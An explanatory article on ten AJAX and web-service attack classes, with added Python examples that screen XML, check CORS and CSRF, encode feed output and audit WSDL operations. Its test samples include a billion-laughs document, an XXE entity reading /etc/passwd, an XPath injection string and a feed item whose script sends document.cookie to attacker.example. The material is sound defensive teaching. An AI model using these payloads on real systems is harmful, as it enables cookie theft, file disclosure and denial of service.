1. Cross-Site Scripting in AJAX
For example, the Yamanner worm exploited a cross-site scripting vulnerability in the AJAX interface of Yahoo! Mail, and the Samy worm exploited a cross-site scripting vulnerability in MySpace.com. The common pattern is that the AJAX client inserts data returned by the server into the page without encoding it, so attacker-controlled content in a mail or a profile runs as script in the victim's session.
2. XML poisoning
Attackers can mount a denial of service by duplicating nodes until the document is huge or deeply nested, or by declaring entities that expand recursively, and they can send malformed XML to break the server's processing logic. If the parser resolves external entities, an attacker can declare one that points at a local file or at a host and TCP port, making the server read that file or open that connection. A poisoned DTD (document type definition) can likewise change how the document is processed and help the attacker obtain confidential information.
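The defence against every variant above is the same: refuse the DTD, the entity declarations and the external references before a real parser ever expands them, and cap depth and element count. The following is an added example, not code from the original article, written with Python's standard-library expat binding; the sample documents are constructed for the demonstration, and the limits (32 levels, 10,000 elements) are assumed values a service would tune.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when a document carries a DTD/entities or exceeds the size limits."""


def check_xml(data, max_depth=32, max_elements=10_000):
    """Pre-screen an XML document with expat before handing it to the
    application's real parser.

    Rejects any DOCTYPE (internal subset or external DTD reference), any
    entity declaration, any external entity reference, nesting deeper than
    max_depth, more than max_elements elements, and malformed XML.
    Returns the root element's qualified name when the document is accepted.
    """
    parser = expat.ParserCreate()
    # Never fetch or expand parameter entities (external DTD subsets).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    state = {"depth": 0, "count": 0, "root": None}

    def reject(*_args):
        # Raising inside a handler aborts the parse; Parse() re-raises it.
        raise UnsafeXML("DTD, entity declaration or external entity reference not allowed")

    parser.StartDoctypeDeclHandler = reject    # <!DOCTYPE ...> of any kind
    parser.EntityDeclHandler = reject          # <!ENTITY ...> (billion laughs, XXE)
    parser.ExternalEntityRefHandler = reject   # &ext; pointing at a file or URL

    def start_element(name, _attrs):
        state["count"] += 1
        state["depth"] += 1
        if state["root"] is None:
            state["root"] = name
        if state["depth"] > max_depth:
            raise UnsafeXML(f"nesting deeper than {max_depth} (node-duplication DoS)")
        if state["count"] > max_elements:
            raise UnsafeXML(f"more than {max_elements} elements")

    def end_element(_name):
        state["depth"] -= 1

    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element

    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}") from exc
    return state["root"]


def is_safe(data):
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        check_xml(data)
        return True
    except UnsafeXML:
        return False


# Constructed samples for the demonstration (not taken from the original page).
BILLION_LAUGHS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""

XXE = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>"""

DEEP = "<a>" * 40 + "<b/>" + "</a>" * 40   # 41 levels of node duplication

CLEAN = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body><getOrder><id>42</id></getOrder></soapenv:Body>
</soapenv:Envelope>"""

if __name__ == "__main__":
    for label, doc in [("clean", CLEAN), ("billion laughs", BILLION_LAUGHS),
                       ("xxe", XXE), ("deep", DEEP)]:
        print(f"{label}: {'accepted' if is_safe(doc) else 'rejected'}")
```

The screen is deliberately stricter than the XML specification: legitimate documents that need a DTD are rare in AJAX and SOAP traffic, and refusing all of them removes the entity-expansion and external-entity classes in one step rather than relying on each downstream parser's own settings.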
3. Running malicious AJAX code
AJAX code runs without the user noticing. Suppose the user has logged in to a confidential site, received a session cookie, and not logged out. A page on the attacker's site can then issue AJAX requests to the confidential site, and the browser attaches that site's session cookie to each of them, because cookies are scoped to the site being requested, not to the page that makes the request. The original wording, "When the browser makes an AJAX call to any Web site it replays cookies for each request", is imprecise: the browser sends only the cookies that belong to the requested site and never hands one site's cookie to another. That is still enough for the attacker's page to perform actions on the confidential site in the user's name (cross-site request forgery). Reading the responses is a different matter: the same-origin policy stops the attacker's script from reading them unless the confidential site's CORS policy grants credentialed access to the attacker's origin, or the data is exposed as script (for example JSONP). Modern browsers' SameSite cookie defaults further limit which cross-site requests carry the cookie at all.
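On the confidential site's server the two halves of this problem map to two checks: never grant credentialed CORS access to an origin that is not yours (otherwise the attacker's script can read the responses), and refuse state-changing requests that did not come from your own pages (otherwise the cookie alone authorises the forged call). The following is an added example, not code from the original article; the trusted origin https://mail.example.com and the sample request headers are constructed assumptions, and the header dictionaries are assumed to use canonical header names.

```python
from urllib.parse import urlsplit

# Assumption: the confidential site's own origin(s). Anything else is cross-site.
TRUSTED_ORIGINS = {"https://mail.example.com"}
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def cors_response_headers(request_headers):
    """Decide whether a cross-origin caller may read our response with credentials.

    The Origin header is matched against an allow-list, never reflected blindly:
    reflecting it together with Allow-Credentials would hand any site the
    logged-in user's data. An empty dict means the browser keeps the response
    away from the calling page's script.
    """
    origin = request_headers.get("Origin")
    if origin in TRUSTED_ORIGINS:
        return {
            "Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin",
        }
    return {}


def request_origin(request_headers):
    """Origin of the page that issued the request; falls back to Referer."""
    origin = request_headers.get("Origin")
    if origin:
        return origin
    referer = request_headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def is_forged_cross_site_request(method, request_headers):
    """True when a state-changing request must be refused even though the browser
    attached a valid session cookie: it came from a foreign (or unknown) origin,
    or it lacks the custom header that a cross-site page cannot add without a
    CORS preflight, and cors_response_headers() denies that preflight."""
    if method.upper() in SAFE_METHODS:
        return False
    if request_origin(request_headers) not in TRUSTED_ORIGINS:
        return True
    return request_headers.get("X-Requested-With") != "XMLHttpRequest"


# Constructed sample requests (not from the original page). Both carry the
# victim's cookie; only the origin and the custom header differ.
ATTACKER_POST = {"Origin": "https://attacker.example", "Cookie": "session=abc123"}
LEGIT_POST = {"Origin": "https://mail.example.com", "Cookie": "session=abc123",
              "X-Requested-With": "XMLHttpRequest"}

if __name__ == "__main__":
    print("attacker CORS headers:", cors_response_headers(ATTACKER_POST))
    print("attacker POST forged:", is_forged_cross_site_request("POST", ATTACKER_POST))
    print("legit POST forged:", is_forged_cross_site_request("POST", LEGIT_POST))
```

GET requests are exempted only on the assumption that they do not change state; an application that performs actions on GET needs the same check there as well.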
4. RSS/Atom Injection
Attackers can embed JavaScript in RSS/Atom feed entries, in titles and descriptions or in link URLs such as javascript: links. If the server does not sanitize or encode the feed content before the browser renders it, the script runs in the context of the site that displays the feed.
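Items 1 and 4 are the same flaw seen from two directions: untrusted text reaches the browser through an AJAX response without being encoded for the place it lands. The following is an added example, not code from the original article, showing a server-side render of one feed entry in both the HTML-fragment form (for clients that use innerHTML) and the JSON form (for clients that build the DOM with textContent). The malicious feed item is constructed for the demonstration.

```python
import html
import json
from urllib.parse import urlsplit

ALLOWED_LINK_SCHEMES = {"http", "https"}


def safe_url(url):
    """Only absolute http(s) URLs survive; javascript:, data:, vbscript: and
    relative tricks collapse to '#'. Returned unescaped so each output context
    can apply its own encoding."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() in ALLOWED_LINK_SCHEMES and parts.netloc:
        return url
    return "#"


def render_feed_item_html(item):
    """HTML fragment for one feed entry, as an AJAX endpoint would return it for
    insertion with innerHTML. Every field is escaped for the context it lands in:
    element content for title/summary, attribute value for the href."""
    title = html.escape(item.get("title", ""), quote=True)
    summary = html.escape(item.get("summary", ""), quote=True)
    href = html.escape(safe_url(item.get("link", "")), quote=True)
    return f'<li><a href="{href}">{title}</a><p>{summary}</p></li>'


def render_feed_json(items):
    """JSON variant for clients that assign fields with textContent.
    '<', '>' and '&' are emitted as \\u escapes, which is still valid JSON, so
    the body cannot terminate a <script> block even if a page ever embeds it
    inline instead of fetching it."""
    payload = [
        {
            "title": item.get("title", ""),
            "link": safe_url(item.get("link", "")),
            "summary": item.get("summary", ""),
        }
        for item in items
    ]
    body = json.dumps(payload, ensure_ascii=True)
    return body.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


# Constructed malicious feed entry (not from the original page): script in the
# title, an event handler in the summary, and a javascript: link.
MALICIOUS_ITEM = {
    "title": "News <script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
    "link": "javascript:alert(document.cookie)",
    "summary": '<img src=x onerror="alert(1)">',
}

if __name__ == "__main__":
    print(render_feed_item_html(MALICIOUS_ITEM))
    print(render_feed_json([MALICIOUS_ITEM]))
```

The JSON form is the one to prefer for new AJAX endpoints: the client then never has to parse HTML, and a textContent assignment cannot execute anything regardless of what the feed contained.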
5. WSDL scan and enumeration
WSDL describes the technologies a Web service uses, the methods it exposes, how they are invoked, and the message formats. If a Web service does not remove unneeded methods from what it publishes, an attacker can scan and enumerate the WSDL to find potential attack points, such as administrative or debugging operations that were never meant for public callers.
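A WSDL scan is simply a walk over the published document. The following is an added example, not code from the original article: it enumerates the operations a WSDL 1.1 document advertises and diffs them against the operations the service is documented to offer, which is the check a service owner should run before an attacker does. The sample WSDL, the operation names and the orders.example namespace are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

WSDL_NS = "http://schemas.xmlsoap.org/wsdl/"
SOAP_NS = "http://schemas.xmlsoap.org/wsdl/soap/"
NS = {"wsdl": WSDL_NS, "soap": SOAP_NS}


def enumerate_operations(wsdl_text):
    """List every operation a WSDL 1.1 document advertises as
    (portType, operation, input message, soapAction) tuples. This is what a
    WSDL scan collects: each tuple is a callable entry point on the server."""
    root = ET.fromstring(wsdl_text)
    soap_actions = {}
    for binding in root.findall("wsdl:binding", NS):
        for op in binding.findall("wsdl:operation", NS):
            soap_op = op.find("soap:operation", NS)
            if soap_op is not None:
                soap_actions[op.get("name")] = soap_op.get("soapAction", "")
    found = []
    for port_type in root.findall("wsdl:portType", NS):
        for op in port_type.findall("wsdl:operation", NS):
            inp = op.find("wsdl:input", NS)
            message = inp.get("message", "") if inp is not None else ""
            found.append((port_type.get("name"), op.get("name"), message,
                          soap_actions.get(op.get("name"), "")))
    return found


def unexpected_operations(wsdl_text, documented):
    """Operations the service exposes but the documented API does not list:
    the candidates to remove from the WSDL (and from the server) before an
    attacker finds them."""
    return {op for _, op, _, _ in enumerate_operations(wsdl_text)} - set(documented)


# Constructed sample WSDL (not from the original page). ExportAllCustomers is
# the kind of leftover operation a scan turns up.
SAMPLE_WSDL = """<definitions xmlns="http://schemas.xmlsoap.org/wsdl/"
             xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
             xmlns:xsd="http://www.w3.org/2001/XMLSchema"
             xmlns:tns="http://orders.example/" targetNamespace="http://orders.example/">
  <message name="GetOrderStatusIn"><part name="orderId" type="xsd:int"/></message>
  <message name="PlaceOrderIn"><part name="order" type="tns:Order"/></message>
  <message name="ExportAllCustomersIn"/>
  <portType name="OrdersPort">
    <operation name="GetOrderStatus"><input message="tns:GetOrderStatusIn"/></operation>
    <operation name="PlaceOrder"><input message="tns:PlaceOrderIn"/></operation>
    <operation name="ExportAllCustomers"><input message="tns:ExportAllCustomersIn"/></operation>
  </portType>
  <binding name="OrdersBinding" type="tns:OrdersPort">
    <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation name="GetOrderStatus"><soap:operation soapAction="urn:orders#GetOrderStatus"/></operation>
    <operation name="PlaceOrder"><soap:operation soapAction="urn:orders#PlaceOrder"/></operation>
    <operation name="ExportAllCustomers"><soap:operation soapAction="urn:orders#ExportAllCustomers"/></operation>
  </binding>
</definitions>"""

DOCUMENTED_API = ["GetOrderStatus", "PlaceOrder"]   # assumed public API surface

if __name__ == "__main__":
    for port_type, op, message, action in enumerate_operations(SAMPLE_WSDL):
        print(f"{port_type}.{op}  input={message}  soapAction={action}")
    print("undocumented:", unexpected_operations(SAMPLE_WSDL, DOCUMENTED_API))
```

Removing an operation from the WSDL is not enough on its own; the server must stop dispatching it, since an attacker who already knows the soapAction does not need the WSDL.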
6. Data validation in client-side AJAX code
If developers rely on client-side validation alone and do not re-validate on the server, an attacker simply bypasses the browser and sends the request directly, which leads to SQL injection, LDAP injection, and similar attacks.
7. Web service routing problems
WS-Routing specifies how a SOAP message travels through a chain of intermediaries (relays) to its final destination. If any intermediary on that path is compromised, the SOAP messages passing through it can be intercepted or altered unless the message itself is protected end to end, for example with WS-Security signing and encryption.
8. Parameter manipulation in SOAP messages
As with SQL injection, if the data carried in SOAP message nodes is not validated on the server, an attacker can tamper with parameter values to inject into back-end queries or change what the operation does.
9. XPath injection via SOAP messages
As with SQL injection, if message data is placed unvalidated into an XPath expression, an attacker can change the query's logic; the classic case is a credential value such as ' or '1'='1 that makes the predicate match every user node.
10. Manipulating the binaries of RIA thick clients
Because Rich Internet Application components are downloaded to the browser, an attacker can reverse-engineer the binaries, decompile the code, modify the files, and bypass any authentication logic that runs only on the client.